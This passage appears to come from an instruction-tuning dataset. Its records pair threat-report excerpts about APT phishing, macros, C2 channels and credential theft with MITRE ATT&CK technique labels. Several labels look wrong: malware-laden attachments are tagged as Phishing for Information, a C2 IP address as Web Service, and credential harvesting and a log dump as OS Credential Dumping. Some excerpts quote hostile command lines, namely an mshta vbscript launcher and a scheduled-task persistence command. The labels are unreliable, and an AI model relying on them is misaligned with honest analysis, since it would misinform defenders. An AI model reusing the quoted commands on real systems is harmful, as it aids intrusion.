adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named \"\"\ubbf8\ubd81 \uc815\uc0c1\ud68c\ub2f4 \uc804\ub9dd \ubc0f \ub300\ube44.hwp\"\" (Prospects for US-North Korea Summit .hwp)\"", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The case we found arrived through a targeted email that contained a document file (in docx format).", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Successful execution of the macro within the malicious document results in the installation of APT28\u2019s signature GAMEFISH malware", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the user enables macros, the macro will perform the following actions: Displays decoy content Checks for the existence of a file at %APPDATA%\\wscript.exe If %APPDATA%\\wscript.exe does not exist, the macro converts an embedded hex-encoded string into bytes and saves this data to the %APPDATA%\\wscript.exe", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches \u201cmshta.exe\u201d with the following arguments passed to it: vbscript:Execute(\"\"On Error Resume Next:set w=GetObject(,\"\"\"\"Word.Application\"\"\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\"\") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2\"", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious processes are marked red (click image to enlarge): The following malicious files are dropped and run: C:\\ProgramData\\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\\OFFLINE\\9A189DFE\\C7B7C186\\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\\Users\\Public\\Libraries\\RecordedTV\\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\\Users\\Public\\Libraries\\RecordedTV\\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 \u201cC:\\Windows\\System32\\schtasks.exe\u201d /create /F /sc minute /mo 3 /tn \u201cGoogleUpdateTasksMachineUI\u201d /tr C:\\Users\\Public\\Libraries\\RecordedTV\\backup.vbs 7528c387f853d96420cf7e20f2ad1d32 Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two\u00a0posts by Palo Alto networks and in a post\u00a0by FireEye, which\u00a0wrote about previous campaigns by this threat agent", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.Figure 2: Example malicious Excel documentSimilar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By default, Excel does not allow the download of data from the remote server, but will ask for the user\u2019s consent by presenting the dialog box in Figure 2: Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on \u201cEnable Content\u201d as seen in Figure 2", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Message 3: Headers Received: by mailcenter.support Sender Mercator Institute for China Studies Subject Authoritarian advance Responding to Chinas growing political influence in Europe Body Content and images included within the e-mail body were a direct copy of the following MERICS report: https://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf Notes The hyperlinked text Click here to download the report within the e-mail body lead to a malicious RTF document located at the URL hxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious\u2019 codes small footprint can help enable evasion of automated detection mechanisms based on macro content", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In March, we came across an email with a malware attachment that used the Gamaredon group\u2019s tactics.", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once a user has double-clicked the embedded image, the form executes a VB setup script", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. Once the document was opened, it prompted the user to enable the macro titled \"\"BlackWater.bas\"\".\"", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Many of this APT\u2019s components are signed with phony Intel and AMD digital certificates", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based upon the instructional guide and the provided tools, this package appears consistent with the methodologies FireEye outlined in their research on how these attacks were executed, including specific details such as the use of ICAP via a proxy passthrough, in this case specifically squid, and using certbot to create a Let\u2019s Encrypt SSL certificate", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Encrypting communications using AES and RSA public key cryptography 5", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 19.\u00a0Scrambling \u2018Mac OSX 10.12\u2019 Encryption The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key \u201c\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56\u2033", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The string is formatted as \u201c||||||||\u201d ^slp Sets the sleep and jitter values ^exit Exits the Trojan Table 5 Commands available within the C# variant of RogueRobin Using Google Drive for C2 A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command index table and command handler address table.\u00a0 Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks: Recursively generate a list of files in a directory and send to the control server Terminate a specific process", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The majority of documents used the name \u201cgerry knight\u201d for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This can be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS \u00a0 In order to decrypt this data, the authors have included additional steps from previous versions", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern: Information Gathering: Conducted research into an organization\u2019s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The datasets included: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 6 Authentication dialog box with fake credentials entered On the C2 server, we observed Phishery receiving the inbound request and capturing the credentials, as seen in Figure 7", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) \u2014 obtains passwords from memory gsecdump \u2014 obtains passwords from memory winrar \u2014 compresses data for exfiltration nbtscan \u2014 scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "15 Database dump Decoded, it reveals a detailed log of each affected machine", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Domains The RoyalCli backdoor was attempting to communicate 